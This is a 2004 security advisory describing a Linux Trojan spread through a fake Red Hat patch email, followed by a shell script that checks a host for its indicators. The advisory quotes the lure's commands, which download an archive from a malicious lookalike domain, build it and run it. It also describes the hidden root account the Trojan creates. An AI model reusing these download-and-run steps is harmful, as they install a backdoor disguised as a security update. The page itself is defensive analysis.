
Fedpatch/Fake Red Hat Patch Mailer

infectionvectors.com

November 2004

Vector: Email/download

Impact: Low (low distribution, site blocked, low percentage of RH devices)

Linux entries to the virus databases of most AV vendors are sparse; discoveries of new Trojans written for UNIX platforms often generate attention simply because they are not Windows-based malcode. The last worm that garnered attention on the Linux front was Slapper, which used an OpenSSL exploit to inject itself onto machines around the world.

 

October of 2004 saw a new Linux-targeted piece of malware, known as “FakePatch” or “Fpatch” by the large AV vendors. This Trojan is sent via email and directs users to download a “security patch” (“fileutils”) from a server located at “fedora-redhat.com” which is not to be confused with the legitimate “fedora.redhat.com” site operated by Red Hat Linux.

 

The Trojan creates a user account (“bash”) with root privileges and no password on the victim machine. It also creates a directory under /tmp named “././././././././.”, which marks machines as already infected.

 

The email contains the following exhortation:

 

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

- First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
- Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
- cd fileutils-1.0.6.patch
- make
- ./inst

 

Warning: URL listed above for research only, do not attempt to connect to/download from this site.

 

The gz archive contains two files: inst.c and makefile. Once compiled and executed, the Trojan opens a secure shell daemon on the victim box and emails the author to report which device has been compromised.
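A host-side check for the indicators described above (the extra UID-0 account with an empty password and the hidden entry under /tmp), written as an added example for this page; it is not code from the original write-up or from the Trojan. It runs against constructed sample passwd and shadow files so it can be tried offline: the sample account lines and the .hidden_marker directory name are made up, and the marker check lists any hidden entry under the given tmp directory as an assumption, because the name as quoted (“././././././././.”) resolves to /tmp itself when used as a path.

```shell
#!/bin/sh
# Added example, not code from the infectionvectors.com write-up: a host
# check for the indicators the write-up describes, a root-equivalent account
# ("bash") with no password and an unexpected hidden entry under /tmp.
# File paths are arguments so the check runs against constructed sample
# files offline; on a real host pass /etc/passwd, /etc/shadow and /tmp.

# list_uid0_accounts PASSWD_FILE
# Prints every account whose UID is 0 but whose name is not "root".
list_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# list_empty_passwords SHADOW_FILE
# Prints every account whose password field is empty, i.e. no password is
# needed to log in. Locked ("!", "*") and hashed entries are skipped.
list_empty_passwords() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# list_hidden_tmp_entries TMP_DIR
# Prints dot-prefixed entries directly under TMP_DIR other than "." and "..".
# Assumption: the marker quoted in the write-up, "././././././././.", resolves
# to TMP_DIR itself when used as a path, so this lists every hidden entry
# instead of testing for that exact name; review what it prints by hand.
list_hidden_tmp_entries() {
    ls -a "$1" | grep '^\.' | grep -v -x -e '\.' -e '\.\.'
}

# Constructed sample account files (not taken from a real host) showing an
# infected state: an extra UID-0 "bash" account with an empty password.
# The hash strings are placeholders, not real password hashes.
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bash:x:0:0::/:/bin/bash
EOF
cat > "$SAMPLE_DIR/shadow" <<'EOF'
root:$1$saltsalt$placeholderhashvalue:12700:0:99999:7:::
daemon:*:12700:0:99999:7:::
alice:$1$saltsalt$placeholderhashvalue:12700:0:99999:7:::
bash::12700:0:99999:7:::
EOF
# Constructed hidden directory standing in for the infection marker.
mkdir -p "$SAMPLE_DIR/tmp/.hidden_marker"

# run_check PASSWD_FILE SHADOW_FILE TMP_DIR
# Prints one line per indicator found and returns 1 if any was found.
run_check() {
    found=0
    for u in $(list_uid0_accounts "$1"); do
        echo "INDICATOR: non-root account with UID 0: $u"; found=1
    done
    for u in $(list_empty_passwords "$2"); do
        echo "INDICATOR: account with empty password: $u"; found=1
    done
    for e in $(list_hidden_tmp_entries "$3"); do
        echo "INDICATOR: hidden entry under $3: $e"; found=1
    done
    return $found
}

run_check "$SAMPLE_DIR/passwd" "$SAMPLE_DIR/shadow" "$SAMPLE_DIR/tmp" \
    || echo "host shows infection indicators"
```

On a live host, run it as root (reading /etc/shadow requires it) with `run_check /etc/passwd /etc/shadow /tmp`; a non-zero return means at least one indicator was found. The UID-0 and empty-password checks are generic and worth keeping in any Linux baseline audit, independent of this particular Trojan.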

 

This is a good reminder that no OS or security software is immune to social engineering vectors: if an attacker can successfully entice a user to download and execute code, there is little technical defense that can protect the target machine.

Copyright © 2004 infectionvectors.com. All rights reserved.